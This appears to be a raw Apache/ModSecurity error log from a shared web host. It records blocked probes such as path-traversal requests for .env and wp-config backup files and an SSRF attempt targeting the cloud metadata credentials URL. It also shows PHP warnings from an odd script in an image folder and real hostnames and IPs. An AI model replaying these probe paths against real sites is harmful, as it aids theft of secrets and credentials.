[Tue May 12 02:36:53.516168 2026] [security2:error] [pid 1709071:tid 1709089] [client 18.213.240.226:58201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/topfreecamsites.com"] [unique_id "agJ2JbvMumyrWMfSu7qoJwAAAMI"]
[Tue May 12 02:36:53.516418 2026] [security2:error] [pid 1709071:tid 1709089] [client 18.213.240.226:58201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/topfreecamsites.com"] [unique_id "agJ2JbvMumyrWMfSu7qoJwAAAMI"]
[Tue May 12 02:37:24.773807 2026] [security2:error] [pid 1691274:tid 1691637] [client 43.163.5.216:52418] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agJ2RFfdQaraX_prmqcdoQAAAA4"], referer: http://www.culturesvoile.com
[Tue May 12 02:37:36.173418 2026] [security2:error] [pid 1695975:tid 1695999] [client 43.130.26.3:38204] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agJ2UNVI9ymHBxup74-KyAAAAJU"]
[Tue May 12 02:37:59.330972 2026] [:error] [pid 1707624:tid 1707693] [client 66.249.75.161:47782] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:38:11.791889 2026] [security2:error] [pid 1730207:tid 1730233] [client 43.134.141.244:35298] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJ2czue9Sp-pIv_Bb6PFQAAAVg"]
[Tue May 12 02:38:17.821024 2026] [security2:error] [pid 1695975:tid 1695982] [client 43.134.53.242:45264] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agJ2edVI9ymHBxup74-LAwAAAIQ"]
[Tue May 12 02:38:40.597657 2026] [ssl:error] [pid 1709071:tid 1709087] (EAI 2)Name or service not known: [client 157.245.253.76:43824] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:40.597707 2026] [ssl:error] [pid 1709071:tid 1709087] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:42.326699 2026] [ssl:error] [pid 1709071:tid 1709092] (EAI 2)Name or service not known: [client 103.204.215.230:42863] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:42.326725 2026] [ssl:error] [pid 1709071:tid 1709092] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:44.864044 2026] [ssl:error] [pid 1730207:tid 1730232] (EAI 2)Name or service not known: [client 31.204.49.215:46675] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:44.864074 2026] [ssl:error] [pid 1730207:tid 1730232] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:45.406027 2026] [ssl:error] [pid 1691274:tid 1691296] (EAI 2)Name or service not known: [client 23.91.246.20:36201] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:45.406057 2026] [ssl:error] [pid 1691274:tid 1691296] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:53.299889 2026] [ssl:error] [pid 1691274:tid 1691278] (EAI 2)Name or service not known: [client 45.76.4.33:41824] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:53.299920 2026] [ssl:error] [pid 1691274:tid 1691278] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:55.664260 2026] [security2:error] [pid 1730175:tid 1730182] [client 49.51.180.2:52354] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/familles/"] [unique_id "agJ2n3o6NvB9WXx5V-549gAAAQU"]
[Tue May 12 02:38:57.030283 2026] [ssl:error] [pid 1691274:tid 1691289] (EAI 2)Name or service not known: [client 161.129.175.67:40677] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:57.030336 2026] [ssl:error] [pid 1691274:tid 1691289] AH01941: stapling_renew_response: responder error
[Tue May 12 02:38:59.604069 2026] [ssl:error] [pid 1707624:tid 1707693] (EAI 2)Name or service not known: [client 178.171.37.64:43745] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:38:59.604106 2026] [ssl:error] [pid 1707624:tid 1707693] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:06.185173 2026] [ssl:error] [pid 1691274:tid 1691283] (EAI 2)Name or service not known: [client 157.230.230.216:50766] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:06.185232 2026] [ssl:error] [pid 1691274:tid 1691283] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:07.374965 2026] [ssl:error] [pid 1709071:tid 1709087] (EAI 2)Name or service not known: [client 188.95.159.52:38485] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:07.375006 2026] [ssl:error] [pid 1709071:tid 1709087] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:08.730022 2026] [ssl:error] [pid 1709071:tid 1709089] (EAI 2)Name or service not known: [client 45.133.136.6:34287] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:08.730061 2026] [ssl:error] [pid 1709071:tid 1709089] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:09.716400 2026] [ssl:error] [pid 1730207:tid 1730229] (EAI 2)Name or service not known: [client 103.175.186.85:57802] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:09.716442 2026] [ssl:error] [pid 1730207:tid 1730229] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174134/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174134/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174134/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174134/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174134/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174134/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:39:12.962069 2026] [ssl:error] [pid 1730175:tid 1730199] (EAI 2)Name or service not known: [client 66.135.22.130:48948] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:12.962111 2026] [ssl:error] [pid 1730175:tid 1730199] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:13.536197 2026] [ssl:error] [pid 1695975:tid 1695988] (EAI 2)Name or service not known: [client 213.255.251.101:35519] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:13.536225 2026] [ssl:error] [pid 1695975:tid 1695988] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:14.658498 2026] [ssl:error] [pid 1691274:tid 1691287] (EAI 2)Name or service not known: [client 66.17.130.182:40453] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:14.658538 2026] [ssl:error] [pid 1691274:tid 1691287] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:15.398795 2026] [ssl:error] [pid 1695975:tid 1695983] (EAI 2)Name or service not known: [client 187.189.168.44:18943] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:39:15.398835 2026] [ssl:error] [pid 1695975:tid 1695983] AH01941: stapling_renew_response: responder error
[Tue May 12 02:39:34.880735 2026] [security2:error] [pid 1691274:tid 1691294] [client 170.106.167.214:46582] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/09/Exulte-extrait-1.mp3"] [unique_id "agJ2xlfdQaraX_prmqceLQAAABI"]
[Tue May 12 02:39:41.686314 2026] [core:error] [pid 1730175:tid 1730191] [client 93.123.109.164:37976] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:39:41.686605 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.txt"] [unique_id "agJ2zdVI9ymHBxup74-LSwAAAJU"]
[Tue May 12 02:39:41.686697 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/wp-config.php.bak"] [unique_id "agJ2zbOxS7i6i_mT2NLHSQAAAFU"]
[Tue May 12 02:39:41.686712 2026] [:error] [pid 1707624:tid 1707684] [client 93.123.109.164:37872] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.686825 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.txt"] [unique_id "agJ2zdVI9ymHBxup74-LSwAAAJU"]
[Tue May 12 02:39:41.686836 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/wp-config.php.bak"] [unique_id "agJ2zbOxS7i6i_mT2NLHSQAAAFU"]
[Tue May 12 02:39:41.687026 2026] [:error] [pid 1730175:tid 1730191] [client 93.123.109.164:37976] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.687695 2026] [:error] [pid 1691274:tid 1691637] [client 93.123.109.164:37792] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.688319 2026] [security2:error] [pid 1730207:tid 1730226] [client 93.123.109.164:37816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.bak"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdgAAAVE"]
[Tue May 12 02:39:41.688421 2026] [core:error] [pid 1709071:tid 1709111] [client 93.123.109.164:37842] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 02:39:41.688447 2026] [security2:error] [pid 1730207:tid 1730226] [client 93.123.109.164:37816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.bak"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdgAAAVE"]
[Tue May 12 02:39:41.688704 2026] [security2:error] [pid 1730207:tid 1730226] [client 93.123.109.164:37816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdgAAAVE"]
[Tue May 12 02:39:41.691617 2026] [:error] [pid 1709071:tid 1709111] [client 93.123.109.164:37842] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.691793 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbOxS7i6i_mT2NLHSQAAAFU"]
[Tue May 12 02:39:41.691811 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.692003 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LSwAAAJU"]
[Tue May 12 02:39:41.692095 2026] [:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.692650 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/sites/default/settings.php"] [unique_id "agJ2zbvMumyrWMfSu7qowwAAAMM"]
[Tue May 12 02:39:41.692788 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/sites/default/settings.php"] [unique_id "agJ2zbvMumyrWMfSu7qowwAAAMM"]
[Tue May 12 02:39:41.692787 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.backup"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdwAAAVY"]
[Tue May 12 02:39:41.692905 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.backup"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdwAAAVY"]
[Tue May 12 02:39:41.693010 2026] [:error] [pid 1730175:tid 1730188] [client 93.123.109.164:37774] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.693403 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qowwAAAMM"]
[Tue May 12 02:39:41.693575 2026] [autoindex:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:39:41.693580 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.164:37960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zTue9Sp-pIv_Bb6PdwAAAVY"]
[Tue May 12 02:39:41.695589 2026] [:error] [pid 1695975:tid 1696000] [client 93.123.109.164:37920] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.696271 2026] [autoindex:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:39:41.696379 2026] [autoindex:error] [pid 1730207:tid 1730222] [client 93.123.109.164:37808] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:39:41.698053 2026] [security2:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/config/.env"] [unique_id "agJ2zdVI9ymHBxup74-LTQAAAJM"]
[Tue May 12 02:39:41.698174 2026] [security2:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/config/.env"] [unique_id "agJ2zdVI9ymHBxup74-LTQAAAJM"]
[Tue May 12 02:39:41.698435 2026] [security2:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LTQAAAJM"]
[Tue May 12 02:39:41.702413 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "totalcloud.fr"] [uri "/_next/image"] [unique_id "agJ2zVfdQaraX_prmqceMgAAAAI"]
